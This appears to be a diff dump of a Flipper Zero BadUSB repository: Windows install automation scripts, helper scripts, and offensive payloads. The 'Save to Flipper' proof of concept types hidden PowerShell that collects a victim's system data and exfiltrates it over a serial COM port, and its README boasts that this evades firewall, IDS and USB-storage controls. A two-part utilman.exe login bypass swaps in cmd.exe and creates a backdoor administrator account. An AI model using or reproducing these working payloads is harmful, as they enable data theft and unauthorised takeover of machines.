There are plenty of examples of using Ducky Script to exfiltrate data. Exfiltration by webhook/discord can be detected/blocked by IDS and firewall rules. Exfiltration by copying data to a USB flash drive (mass storage driver) can be thwarted by rules disallowing access to USB mass storage devices. The "Save to Flipper" POC makes use of Windows' COM ports and the Powershell serial module. This traffic is much more problematic to block, as many legitimate things can use the COM ports, and it is not affected by blocking access to mass storage devices. Further, you can tweak the device ID to further bypass any restrictions.
|
||||
|
||||
## Limitations:
|
||||
Using serial to interface to the Flipper's CLI in order to save a file is *slow.* This is not a huge problem for small amounts of text data, but could be problematic for a larger exfiltration.
|
||||
|
||||
There also appears to be some kind of buffer size limit that will cause the exfiltrated data to fail to save. This is being investigated.
|
||||
|
||||
## Usage:
|
||||
Attach Flipper to computer by USB cable and run the BadUSB script. Watch the victim's keyboard for the caps lock light to blink a few times. Once it stops blinking, hit Back enough times to get to the Flipper application list (otherwise it won't save the data) and wait a moment and then remove the Flipper. (how long you need to wait depends on how large an exfil you're doing - it's slow)
|
||||
|
||||
## Variables:
|
||||
$d is the command who's output you want to exfiltrate to the Flipper's storage. Make sure to include |Out-String as the last part of the command.
|
||||
|
||||
$BHID and $BPID allow you to specify the Device ID parameters of your Flipper.
|
||||
|
||||
$SPATH is the location on the SD card to store your exfiltrated data. By default, it saves to /ext/apps_data/exfil_data
|
||||
|
||||
## Example
|
||||
This example runs the Get-ComputerInfo command and saves it to the Flipper's SD card under /ext/apps_data/exfil_data
|
||||
|
||||
## Note about early disconnection
|
||||
If the Flipper is disconnected from the host computer *while* it is receiving the exfiltrated data, the Flipper may remain stuck with it's serial CLI open, which will cause it to have an error when connecting it to qFlipper. Simply reboot the Flipper to get it working normally again.
|
||||
|
||||
## STRING vs ALTSTRING
|
||||
There are two versions of this payload. One uses STRING, which is faster but depends on the keyboard layout. ALTSTRING is able to work with different keyboard layouts, but is much slower to deploy
|
36
BadUSB/emptythevoid-BadUSB/save_to_flipper_poc/README.md
Normal file
36
BadUSB/emptythevoid-BadUSB/save_to_flipper_poc/README.md
Normal file
@ -0,0 +1,36 @@
|
||||
# Save data from your BadUSB scripts directly to the Flipper's SD Card!
|
||||
|
||||
Inspired by this thread: https://forum.flipperzero.one/t/anyway-to-save-files-back-to-the-flipper-using-badusb/2372
|
||||
|
||||
Credit: Major credit to @LupusE for taking my original proof-of-concept, running with it, and making a proper example payload!
|
||||
|
||||
This proof of concept is for Windows-only.
|
||||
|
||||
BadUSB script that uses inline Powershell to enumerate which COM port the Flipper is connected to,
|
||||
and then use Powershell's serial module to interface with Flipper's CLI and write text data to a specified file in Flipper's SD Card. It will automatically detect when the Flipper has exited BadUSB mode before writing the data to the SD card.
|
||||
|
||||
## What makes this method unique?
|
||||
There are plenty of examples of using Ducky Script to exfiltrate data. Exfiltration by webhook/discord can be detected/blocked by IDS and firewall rules. Exfiltration by copying data to a USB flash drive (mass storage driver) can be thwarted by rules disallowing access to USB mass storage devices. The "Save to Flipper" POC makes use of Windows' COM ports and the Powershell serial module. This traffic is much more problematic to block, as many legitimate things can use the COM ports, and it is not affected by blocking access to mass storage devices. Further, you can tweak the device ID to further bypass any restrictions.
|
||||
|
||||
## Limitations:
|
||||
Using serial to interface to the Flipper's CLI in order to save a file is *slow.* This is not a huge problem for small amounts of text data, but could be problematic for a larger exfiltration.
|
||||
|
||||
There also appears to be some kind of buffer size limit that will cause the exfiltrated data to fail to save. This is being investigated.
|
||||
|
||||
## Usage:
|
||||
Attach Flipper to computer by USB cable and run the BadUSB script. When the Flipper shows 100% completion, hit Back enough times to get to the Flipper application list (otherwise it won't save the data) and wait a moment and then remove the Flipper.
|
||||
|
||||
## Variables:
|
||||
$d is the command who's output you want to exfiltrate to the Flipper's storage. Make sure to include |Out-String as the last part of the command.
|
||||
|
||||
$BHID and $BPID allow you to specify the Device ID parameters of your Flipper.
|
||||
|
||||
$SPATH is the location on the SD card to store your exfiltrated data. By default, it saves to /ext/apps_data/exfil_data
|
||||
|
||||
## Example
|
||||
This proof-of-concept stores the output of the Powershell Get-ComputerInfo
|
||||
|
||||
There are two payload examples included in the script. One will output to the Powershell console the state of the Flipper (BadUSB/NoFZ) to help you learn how to Back out of the BadUSB application and the timing. The other payload is without debugging and without a delay if the Flipper is simply disconnected.
|
||||
|
||||
## Note about early disconnection
|
||||
If the Flipper is disconnected from the host computer *while* it is receiving the exfiltrated data, the Flipper may remain stuck with it's serial CLI open, which will cause it to have an error when connecting it to qFlipper. Simply reboot the Flipper to get it working normally again.
|
@ -0,0 +1,41 @@
|
||||
REM Title: Save To Flipper PoC
|
||||
REM Author: emptythevoid and LupusE
|
||||
REM Target: Windows 10 (not tested on Windows 11, yet)
|
||||
REM Version: 1.0
|
||||
REM Category: PoC
|
||||
|
||||
REM Open Powershell
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
|
||||
REM Optionally run powershell hidden
|
||||
REM STRING powershell -w h
|
||||
|
||||
REM Comment out the below line if you're using the optional hidden window above
|
||||
STRING powershell
|
||||
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 750
|
||||
|
||||
REM The powershell starts with a delay. This is to give you time to hit BACK twice on the Flipper to get it out of BadUSB mode. Otherwise it wont save data.
|
||||
REM If the normal FZ mode is detected, the script will determine which COM port the Flipper is plugged in and write a string to the specified path/file.
|
||||
|
||||
REM ## Command to execute/data to extract. Don't forget cast to string.
|
||||
ALTSTRING $d=(Get-ComputerInfo|Out-String);
|
||||
|
||||
REM ## The VendorID and ProductID to search. If you'd change the BadUSB IDs in this script, you need to change $BHID as well.
|
||||
ALTSTRING $BHID="HID\\VID_046D\&PID_C529";
|
||||
ALTSTRING $SUSB="USB\\VID_0483\&PID_5740";
|
||||
REM Teh trorage Path where the result is SPATHed at the Flipper Zero SD card
|
||||
ALTSTRING $SPATH="/ext/apps_data/exfil_data"
|
||||
ENTER
|
||||
|
||||
DELAY 1000
|
||||
REM ## Perform 600 loops, to check if BadUSB is still active, wait 1 sec. If the Flipper is just disconnected, the loop will wait 4 sec.
|
||||
ALTSTRING 1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(((Get-PNPDevice -PresentOnly|Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"}) -split "COM")[1][0])",115200,'None',8,'one');$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();break}Catch{If(Get-PNPDevice -PresentOnly|Where {$_.InstanceID -match $BHID}){"BadUSB"}Else{"NoFZ";Start-Sleep 4};Start-Sleep 1}}
|
||||
REM ## Shorter Version, without debug output, no 4 Sec delay, exits powershell upon completion (useful when using powershell -w h)
|
||||
REM ALTSTRING 1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(((Get-PNPDevice -PresentOnly -Class 'Ports' -InstanceID 'USB\VID_0483&PID_5740*') -split "COM")[1][0])",115200,'None',8,'one');$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();break}Catch{Sleep 1}};exit
|
||||
|
||||
ENTER
|
13
BadUSB/emptythevoid-BadUSB/win10_install/README.md
Normal file
13
BadUSB/emptythevoid-BadUSB/win10_install/README.md
Normal file
@ -0,0 +1,13 @@
|
||||
Ducky scripts for the Flipper to automate the GUI for installing Windows 10 Pro, 22H2. Emphasis is on automation, not efficiency (longer delays than necessary)
|
||||
|
||||
Part 1 handles the intial setup, including removing any existing partitions and letting Windows create a new scheme.
|
||||
|
||||
Part 2 Handles the rest of the setup. It is configured to *always* click "I don't have internet", as trying to get Ducky Script to select the correct Wifi SSID from the list is unpredictable. NOTE: you have to choose in the script which version to run - the one where you have no wifi at all, or the one where you have wifi and at least one access point will show up when it scans for access points. This part also handles creation of the initial local user account. Make sure to fill in the STRINGs that contain the information required: User, Password, and three security answers (the script assumes these aren't important so it always selects the first one from the drop down - adjust as you desire)
|
||||
|
||||
Notes about timing: The script implicitly assumes that your computer is relatively fast with an SSD/NVME drive. If the timing is wrong, most commands will accidentally turn on voice assistant. That said, take care when the account is created. If it goes too quickly, it's possible that your password could be added as a user account!
|
||||
|
||||
TODO:
|
||||
|
||||
-Need to add optional code block for when Ethernet and/or Wifi is available (currently it operates under the assumption that internet isn't available)
|
||||
|
||||
-Probably need to set a standard longer delay for part 2, since so many Delay 100 is needed
|
86
BadUSB/emptythevoid-BadUSB/win10_install/win10_part1.txt
Normal file
86
BadUSB/emptythevoid-BadUSB/win10_install/win10_part1.txt
Normal file
@ -0,0 +1,86 @@
|
||||
REM Automate the first part of Windows 10 install.
|
||||
|
||||
REM Target: Windows 10 Pro 22H2
|
||||
|
||||
REM Emphasis is on automating the procedure, not efficiency (longer than necessary delays)
|
||||
REM Start at the Language selection screen
|
||||
|
||||
REM Enter language and click Next. Assume defaults.
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 100
|
||||
|
||||
REM Click Install Now
|
||||
ENTER
|
||||
DELAY 20000
|
||||
|
||||
REM Windows license
|
||||
SPACE
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 100
|
||||
|
||||
REM Type of install = Custom
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM Remove all partitions and start fresh
|
||||
REM Note: If default partitions are absent, it still creates the partitions and completes
|
||||
REM Defaults to "Primary"
|
||||
TAB
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 100
|
||||
LEFT
|
||||
ENTER
|
||||
DELAY 500
|
||||
REM Now at System
|
||||
TAB
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 100
|
||||
LEFT
|
||||
ENTER
|
||||
DELAY 500
|
||||
REM Now at "unallocated"
|
||||
DOWN
|
||||
REM now at "MSR"
|
||||
TAB
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 100
|
||||
LEFT
|
||||
ENTER
|
||||
DELAY 500
|
||||
REM back at "unallocated"
|
||||
DOWN
|
||||
REM now at "recovery"
|
||||
TAB
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 100
|
||||
LEFT
|
||||
ENTER
|
||||
DELAY 15000
|
||||
REM now at 100% unallocated. Click New
|
||||
TAB
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 100
|
||||
REM use all space (default)
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 100
|
||||
REM notice about additional partitions
|
||||
ENTER
|
||||
DELAY 5000
|
||||
REM press Next
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
ENTER
|
156
BadUSB/emptythevoid-BadUSB/win10_install/win10_part2.txt
Normal file
156
BadUSB/emptythevoid-BadUSB/win10_install/win10_part2.txt
Normal file
@ -0,0 +1,156 @@
|
||||
REM Automate second half of Windows 10 install
|
||||
|
||||
REM Target: Windows 10 Pro 22H2
|
||||
|
||||
REM Run this at the "Let's start with the region" screen
|
||||
|
||||
REM FLIPPER DOESN'T SUPPORT VARIABLES??
|
||||
REM Enter in variables here for local user, password, and 3 security answers
|
||||
REM VAR $USER =
|
||||
REM VAR $PASSWORD =
|
||||
REM VAR $RANDOM1 =
|
||||
REM VAR $RANDOM2 =
|
||||
REM VAR $RANDOM3 =
|
||||
|
||||
REM Defaults to United States
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
REM Defaults to US keyboard layout
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
REM Add second keyboard layout. Defaults to Skip
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
REM No internet available, but assume wifi works and detects at least one access point
|
||||
REM Need to insert a long delay in case it enumerates Wifi networks
|
||||
DELAY 15000
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
REM Should be on "I don't have internet"
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
|
||||
REM No Internet Available, no wifi at all
|
||||
REM TAB
|
||||
REM ENTER
|
||||
REM DELAY 5000
|
||||
|
||||
REM Continue with limited setup. Defaults to Connect Now
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
REM Who's going to use this PC?
|
||||
STRING
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
REM Create a super memorable password
|
||||
STRING
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
REM Confirm password
|
||||
STRING
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
REM Security question 1
|
||||
DOWN
|
||||
TAB
|
||||
STRING
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
REM Security question 2
|
||||
DOWN
|
||||
TAB
|
||||
STRING
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
REM Security question 3
|
||||
DOWN
|
||||
TAB
|
||||
STRING
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
REM Skip face sign-in
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
REM disable all privacy defaults
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
SPACE
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
SPACE
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
SPACE
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
SPACE
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
SPACE
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
SPACE
|
||||
DELAY 100
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
REM Just say No to Cortana
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
ENTER
|
||||
|
||||
|
||||
|
@ -0,0 +1,30 @@
|
||||
REM enable the OOBE bypass to allow local account on windows 11
|
||||
REM This file will enable the bypass and reboot the computer
|
||||
|
||||
SHIFT F10
|
||||
DELAY 1000
|
||||
HOLD ALT
|
||||
DELAY 1000
|
||||
HOLD TAB
|
||||
DELAY 500
|
||||
RIGHT
|
||||
DELAY 200
|
||||
RELEASE TAB
|
||||
DELAY 500
|
||||
RELEASE ALT
|
||||
DELAY 1000
|
||||
SHIFT F10
|
||||
DELAY 1000
|
||||
HOLD ALT
|
||||
DELAY 1000
|
||||
HOLD TAB
|
||||
DELAY 500
|
||||
RIGHT
|
||||
DELAY 200
|
||||
RELEASE TAB
|
||||
DELAY 500
|
||||
RELEASE ALT
|
||||
DELAY 1000
|
||||
STRING OOBE\BYPASSNRO
|
||||
DELAY 1000
|
||||
ENTER
|
@ -0,0 +1,33 @@
|
||||
REM enable the OOBE bypass to allow local account on windows 11
|
||||
REM This is an optional second step, that will release DHCP addresses.
|
||||
REM Use this after the computer has rebooted from part 1
|
||||
|
||||
SHIFT F10
|
||||
DELAY 1000
|
||||
HOLD ALT
|
||||
DELAY 1000
|
||||
HOLD TAB
|
||||
DELAY 500
|
||||
RIGHT
|
||||
DELAY 200
|
||||
RELEASE TAB
|
||||
DELAY 500
|
||||
RELEASE ALT
|
||||
DELAY 1000
|
||||
SHIFT F10
|
||||
DELAY 1000
|
||||
HOLD ALT
|
||||
DELAY 1000
|
||||
HOLD TAB
|
||||
DELAY 500
|
||||
RIGHT
|
||||
DELAY 200
|
||||
RELEASE TAB
|
||||
DELAY 500
|
||||
RELEASE ALT
|
||||
DELAY 1000
|
||||
STRING ipconfig /release
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING EXIT
|
||||
ENTER
|
25
BadUSB/emptythevoid-BadUSB/win11_install/readme.md
Normal file
25
BadUSB/emptythevoid-BadUSB/win11_install/readme.md
Normal file
@ -0,0 +1,25 @@
|
||||
Windows 11 installer helpers. You must use these with a fresh Windows 11 ISO installer on a USB boot drive.
|
||||
|
||||
These will likely fail to work as expected when the computer is set up with an OEM install.
|
||||
|
||||
These come in two parts:
|
||||
|
||||
Part 1- Handles the initial setup of wiping out any existing partitions, setting up the disk, and installing Windows. No customization is needed here.
|
||||
|
||||
Part 2- Handles the "setup" after install. You need to modify a few things for your setup:
|
||||
|
||||
youruser
|
||||
|
||||
yourpassword
|
||||
|
||||
security 1
|
||||
|
||||
security 2
|
||||
|
||||
security 3
|
||||
|
||||
It is highly recommended NOT to have your computer connected to Ethernet when you perform the installation, otherwise it will perform updates and try to make you use a Microsoft account.
|
||||
|
||||
If, however, Ethernet is plugged in, Part 2 will release the DHCP IP address before setup. Once the setup is complete, Flipper will PAUSE and wait for a button press. Perform this after the computer is safely at the desktop. This will renew the IP configuration.
|
||||
|
||||
The OOBE bypass scripts are likely not needed and obsolete.
|
@ -0,0 +1,84 @@
|
||||
REM Handle first phase of Windows 11 installation, 22H2, 23H2
|
||||
|
||||
REM Author: emptythevoid
|
||||
|
||||
REM Next
|
||||
ALT y
|
||||
|
||||
DELAY 100
|
||||
|
||||
REM Install Now
|
||||
ENTER
|
||||
|
||||
DELAY 20000
|
||||
|
||||
REM License
|
||||
SPACE
|
||||
|
||||
ALT n
|
||||
DELAY 2000
|
||||
|
||||
REM Type of Installation - Custom
|
||||
|
||||
ALT c
|
||||
DELAY 1000
|
||||
|
||||
REM Delete any and all partitions
|
||||
REM should be able to simply repeate this over and over after the fisrt one
|
||||
REM as soon as all are gone, the command will trigger the Next button
|
||||
REM and begin installation
|
||||
|
||||
ALT d
|
||||
DELAY 200
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
REM repeat the blocks below for however many partitions you think you'll need to remove
|
||||
|
||||
DOWN
|
||||
ALT d
|
||||
DELAY 200
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
DOWN
|
||||
ALT d
|
||||
DELAY 200
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 200
|
||||
|
||||
DOWN
|
||||
ALT d
|
||||
DELAY 200
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
DOWN
|
||||
ALT d
|
||||
DELAY 200
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
DOWN
|
||||
ALT d
|
||||
DELAY 200
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
REM one up arrow partition removal, for safety
|
||||
UP
|
||||
ALT d
|
||||
DELAY 200
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM Assume that NO partitions exist.
|
||||
ALT n
|
171
BadUSB/emptythevoid-BadUSB/win11_install/win11_install_part2.txt
Normal file
171
BadUSB/emptythevoid-BadUSB/win11_install/win11_install_part2.txt
Normal file
@ -0,0 +1,171 @@
|
||||
REM Win11 Install part 2 23H2
|
||||
|
||||
REM Author: emptythevoid
|
||||
|
||||
REM If your device uses wifi, don't join it to any network and it should work properly
|
||||
REM This script will release DHCP so that it won't try to check for updates and
|
||||
REM attempt to use a Microsoft account
|
||||
REM The script will pause after privacy settings are entered.
|
||||
REM Wait until you're safely at the Windows desktop and press the OK button to renew DHCP
|
||||
|
||||
REM Release DHCP
|
||||
SHIFT F10
|
||||
DELAY 1000
|
||||
|
||||
REM HOLD ALT
|
||||
REM DELAY 1000
|
||||
REM TAB
|
||||
REM DELAY 100
|
||||
REM TAB
|
||||
REM DELAY 100
|
||||
REM RELEASE ALT
|
||||
|
||||
CTRL-ALT TAB
|
||||
|
||||
DELAY 1000
|
||||
RIGHT ARROW
|
||||
DELAY 100
|
||||
ENTER
|
||||
|
||||
DELAY 1000
|
||||
STRING ipconfig /release
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING EXIT
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
CTRL-ALT TAB
|
||||
DELAY 100
|
||||
ENTER
|
||||
DELAY 100
|
||||
|
||||
REM are we still defaulted to Enter->YES ? NO.
|
||||
TAB
|
||||
TAB
|
||||
|
||||
|
||||
REM Country or Region
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
REM Keyboard layout
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
REM Skip second keyboard layout
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
REM Connect to Wifi - Choose I don't have Internet
|
||||
SHIFT TAB
|
||||
SPACE
|
||||
DELAY 5000
|
||||
|
||||
REM Continue with limited setup
|
||||
SHIFT TAB
|
||||
SPACE
|
||||
DELAY 5000
|
||||
|
||||
REM who is going to use this device
|
||||
STRING <yourusername>
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM Password
|
||||
STRING <your password>
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING <your password>
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM Security Questions
|
||||
DOWN
|
||||
TAB
|
||||
STRING <security 1>
|
||||
ENTER
|
||||
DELAY 200
|
||||
DOWN
|
||||
TAB
|
||||
STRING <security 2>
|
||||
ENTER
|
||||
DELAY 200
|
||||
DOWN
|
||||
TAB
|
||||
STRING <security 3>
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
REM Choose privacy settings
|
||||
REM CANNOT tab forward, because it may break depending on if there is a sound icon or not
|
||||
REM use SHIFT TAB to back up to the top
|
||||
REM how many times? 7
|
||||
|
||||
SHIFT TAB
|
||||
DELAY 100
|
||||
SHIFT TAB
|
||||
DELAY 100
|
||||
SHIFT TAB
|
||||
DELAY 100
|
||||
SHIFT TAB
|
||||
DELAY 100
|
||||
SHIFT TAB
|
||||
DELAY 100
|
||||
SHIFT TAB
|
||||
DELAY 100
|
||||
SHIFT TAB
|
||||
DELAY 100
|
||||
|
||||
REM TAB
|
||||
REM DELAY 1000
|
||||
REM TAB
|
||||
REM DELAY 1000
|
||||
|
||||
SPACE
|
||||
|
||||
DELAY 1000
|
||||
TAB
|
||||
SPACE
|
||||
|
||||
DELAY 1000
|
||||
TAB
|
||||
SPACE
|
||||
|
||||
DELAY 1000
|
||||
TAB
|
||||
SPACE
|
||||
|
||||
DELAY 1000
|
||||
TAB
|
||||
SPACE
|
||||
|
||||
DELAY 1000
|
||||
TAB
|
||||
SPACE
|
||||
|
||||
DELAY 1000
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 1000
|
||||
ENTER
|
||||
|
||||
REM Wait for button press to re-enable DHCP
|
||||
REM This should be run when we're at the windows Desktop
|
||||
WAIT_FOR_BUTTON_PRESS
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING cmd
|
||||
DELAY 100
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING ipconfig /renew
|
||||
DELAY 100
|
||||
ENTER
|
||||
|
||||
REM Wait 10 seconds for DHCP to renew before attempting to close terminal
|
||||
DELAY 10000
|
||||
STRING exit
|
||||
DELAY 100
|
||||
ENTER
|
1
BadUSB/emptythevoid-BadUSB/windows_helpers/README.md
Normal file
1
BadUSB/emptythevoid-BadUSB/windows_helpers/README.md
Normal file
@ -0,0 +1 @@
|
||||
Helper BadUSB scripts for Windows.
|
@ -0,0 +1,11 @@
|
||||
DELAY 500
|
||||
|
||||
GUI S
|
||||
DELAY 500
|
||||
STRING check for updates
|
||||
DELAY 1000
|
||||
ENTER
|
||||
DELAY 5000
|
||||
TAB
|
||||
TAB
|
||||
SPACE
|
@ -0,0 +1,12 @@
|
||||
DELAY 500
|
||||
|
||||
GUI S
|
||||
DELAY 500
|
||||
STRING check for updates
|
||||
DELAY 1000
|
||||
ENTER
|
||||
DELAY 5000
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
SPACE
|
@ -0,0 +1,13 @@
|
||||
DELAY 500
|
||||
GUI R
|
||||
DELAY 500
|
||||
STRING cmd
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING ipconfig /renew
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING exit
|
||||
DELAY 200
|
||||
ENTER
|
@ -0,0 +1,12 @@
|
||||
DELAY 500
|
||||
GUI R
|
||||
DELAY 500
|
||||
REM STRING shutdown /s /t 0
|
||||
STRING shutdown /p
|
||||
DELAY 100
|
||||
ENTER
|
||||
|
||||
REM Handle apps preventing computer from shutting down
|
||||
DELAY 20000
|
||||
SHIFT TAB
|
||||
ENTER
|
@ -0,0 +1,16 @@
|
||||
REM set timezone to Eastern
|
||||
DELAY 500
|
||||
GUI R
|
||||
DELAY 500
|
||||
STRING cmd
|
||||
DELAY 100
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
ALTSTRING tzutil /s "Eastern Standard Time"
|
||||
ENTER
|
||||
|
||||
DELAY 300
|
||||
|
||||
ALTSTRING exit
|
||||
ENTER
|
@ -0,0 +1,8 @@
|
||||
Two scripts to perform the utilman.exe -> cmd.exe trick when using a Windows boot media.
|
||||
|
||||
Part 1 is to be used while booted from the USB media. Run it at the Install screen.
|
||||
|
||||
Part 2 is used after utilman.exe has been renamed, and is used to create a new admin account at the login screen,
|
||||
utilizing the utilman.exe switcheroo set up in Part 1.
|
||||
|
||||
Note, this trick will not work if Bitlocker is enabled.
|
@ -0,0 +1,36 @@
|
||||
REM Bypass Windows login using Windows boot media.
|
||||
REM This automates the commands used to rename the utilman.exe file to cmd.exe
|
||||
|
||||
REM Author: emptythevoid
|
||||
|
||||
REM Does not work if C: has full drive encryption enabled
|
||||
|
||||
REM Run this when you see the first install screen
|
||||
|
||||
REM == Bring up Terminal =====================
|
||||
SHIFT F10
|
||||
DELAY 1000
|
||||
|
||||
REM == Change directory to system32:
|
||||
STRING C:
|
||||
ENTER
|
||||
DELAY 100
|
||||
STRING cd c:\windows\system32\
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
REM == Rename utilman.exe
|
||||
REM == By default, Windows will be on C:
|
||||
REM == Change the command below as needed
|
||||
STRING ren utilman.exe utilman2.exe
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
REM == Copy the cmd.exe into utilman.exe
|
||||
STRING copy cmd.exe utilman.exe
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
REM == Reboot
|
||||
STRING shutdown /r /t 0
|
||||
ENTER
|
@ -0,0 +1,56 @@
|
||||
REM Bypass Windows Login - second phase
|
||||
|
||||
REM Author: emptythevoid
|
||||
|
||||
REM change the net user username and password below as needed
|
||||
|
||||
REM Run this immediately at login. Press nothing else on the computer
|
||||
|
||||
REM try to wake the screen
|
||||
CTRL-ALT DEL
|
||||
DELAY 3000
|
||||
|
||||
GUI u
|
||||
DELAY 2000
|
||||
|
||||
REM should be at the cmd.exe now
|
||||
|
||||
REM create our new user and add them to the administrators group
|
||||
|
||||
STRING net user mrrobot password123! /add
|
||||
ENTER
|
||||
|
||||
DELAY 500
|
||||
|
||||
STRING net localgroup administrators mrrobot /add
|
||||
ENTER
|
||||
|
||||
DELAY 500
|
||||
|
||||
REM switch to new user here
|
||||
REM the other user won't immediately be visible from the user selection on the left.
|
||||
REM it *will* appear if the screen is allowed to go to sleep
|
||||
REM to force this, run tsdiscon.exe, but this doesn't work on Windows Home (the file isn't available)
|
||||
|
||||
STRING tsdiscon.exe
|
||||
ENTER
|
||||
|
||||
DELAY 500
|
||||
|
||||
REM close the terminal
|
||||
ALT F4
|
||||
|
||||
DELAY 1000
|
||||
|
||||
REM is there a way to change the last logged in user, so it's easier to automatically login as them, without having to TAB and hope for the best?
|
||||
REM https://gist.github.com/dbirks/ec4416c9064a323b14f435ee934efd71?permalink_comment_id=2370507
|
||||
|
||||
REM Optionally, go ahead and login here
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 300
|
||||
STRING password123!
|
||||
ENTER
|
||||
|
Loading…
Reference in New Issue
Block a user